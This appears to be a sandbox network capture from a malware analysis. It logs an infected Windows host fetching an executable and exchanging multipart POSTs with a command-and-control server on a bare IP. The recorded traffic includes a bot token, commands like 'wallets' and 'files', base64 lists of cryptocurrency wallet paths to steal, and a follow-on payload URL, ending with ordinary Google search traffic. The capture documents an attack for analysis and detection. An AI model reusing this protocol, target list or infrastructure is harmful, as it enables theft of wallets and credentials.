                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.415859938 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:44 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "13bf0-5e7ebd4425100"
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                Content-Length: 80880
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.670927048 CET201OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BFIDGDAKFHIEHJKFHDHD
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Content-Length: 1067
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.934295893 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:44 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.007555962 CET467OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIE
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Content-Length: 267
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="message"wallets------HCAFIJDGHCBFHJKFCGIE--
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.251456022 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:45 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Length: 2408
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=94
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.256167889 CET465OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AFHDHCAAKECFIDHIEBAK
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Content-Length: 265
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="message"files------AFHDHCAAKECFIDHIEBAK--
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.499259949 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:45 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=93
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.525288105 CET563OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIE
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Content-Length: 363
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: ------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="file"------IJEHIDHDAKJDHJKEBFIE--
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.771027088 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:45 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=92
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:45.983941078 CET202OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----DAKFCGIJKJKFHIDHIIIE
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Content-Length: 98127
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.559789896 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:46 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=91
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.636023045 CET472OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AKFCFBAAEHCFHJJKEHJK
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Content-Length: 272
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 43 46 42 41 41 45 48 43 46 48 4a 4a 4b 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 43 46 42 41 41 45 48 43 46 48 4a 4a 4b 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 43 46 42 41 41 45 48 43 46 48 4a 4a 4b 45 48 4a 4b 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ------AKFCFBAAEHCFHJJKEHJKContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------AKFCFBAAEHCFHJJKEHJKContent-Disposition: form-data; name="message"ybncbhylepme------AKFCFBAAEHCFHJJKEHJK--
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.906172991 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:46 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Length: 72
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=90
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 61 48 52 30 63 48 4d 36 4c 79 39 6a 59 57 31 77 64 58 4e 77 5a 58 4a 7a 5a 58 5a 6c 63 69 35 6c 63 79 39 6a 61 48 4a 76 62 57 56 66 4f 54 4d 75 5a 58 68 6c 66 44 46 38 4d 48 78 54 64 47 46 79 64 48 77 77 66 41 3d 3d
                                                                                                                                                                                                                                                                                                                                Data Ascii: aHR0cHM6Ly9jYW1wdXNwZXJzZXZlci5lcy9jaHJvbWVfOTMuZXhlfDF8MHxTdGFydHwwfA==
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.675555944 CET472OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----IDHJEBGIEBFIJKEBFBFH
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Content-Length: 272
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ------IDHJEBGIEBFIJKEBFBFHContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------IDHJEBGIEBFIJKEBFBFHContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IDHJEBGIEBFIJKEBFBFH--
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:49.072098970 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:48 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=89
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                0192.168.2.549710142.250.186.1004431436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:09 UTC623OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCJDKzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:09 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:09 GMT
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-5r3_n4udfNSQikXybZwZuw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:09 UTC112INData Raw: 33 33 30 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 63 68 72 69 73 20 62 65 79 20 74 6e 61 20 69 6e 6a 75 72 79 22 2c 22 74 61 72 67 65 74 20 74 68 61 6e 6b 73 67 69 76 69 6e 67 20 6d 65 61 6c 20 64 65 61 6c 22 2c 22 72 61 6e 67 65 72 73 20 72 65 63 61 6c 6c 20 72 65 6d 70 65 22 2c 22 74 79 63 6f 6f 6e 20 63 61 6e 64 79 20 73 74 6f 72 65
                                                                                                                                                                                                                                                                                                                                Data Ascii: 330)]}'["",["chris bey tna injury","target thanksgiving meal deal","rangers recall rempe","tycoon candy store
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:09 UTC711INData Raw: 20 6d 6f 6e 6f 70 6f 6c 79 20 67 6f 20 72 65 77 61 72 64 73 22 2c 22 73 65 70 74 61 20 77 6f 72 6b 65 72 73 20 73 74 72 69 6b 65 22 2c 22 62 6f 6c 64 20 61 6e 64 20 62 65 61 75 74 69 66 75 6c 20 73 70 6f 69 6c 65 72 73 20 6f 63 74 6f 62 65 72 20 32 38 22 2c 22 67 6f 6c 64 65 6e 20 73 74 61 74 65 20 77 61 72 72 69 6f 72 73 20 6c 61 20 63 6c 69 70 70 65 72 73 22 2c 22 6d 6f 6e 73 74 65 72 20 68 75 6e 74 65 72 20 77 69 6c 64 73 20 6f 70 65 6e 20 62 65 74 61 20 74 65 73 74 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f
                                                                                                                                                                                                                                                                                                                                Data Ascii: monopoly go rewards","septa workers strike","bold and beautiful spoilers october 28","golden state warriors la clippers","monster hunter wilds open beta test"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


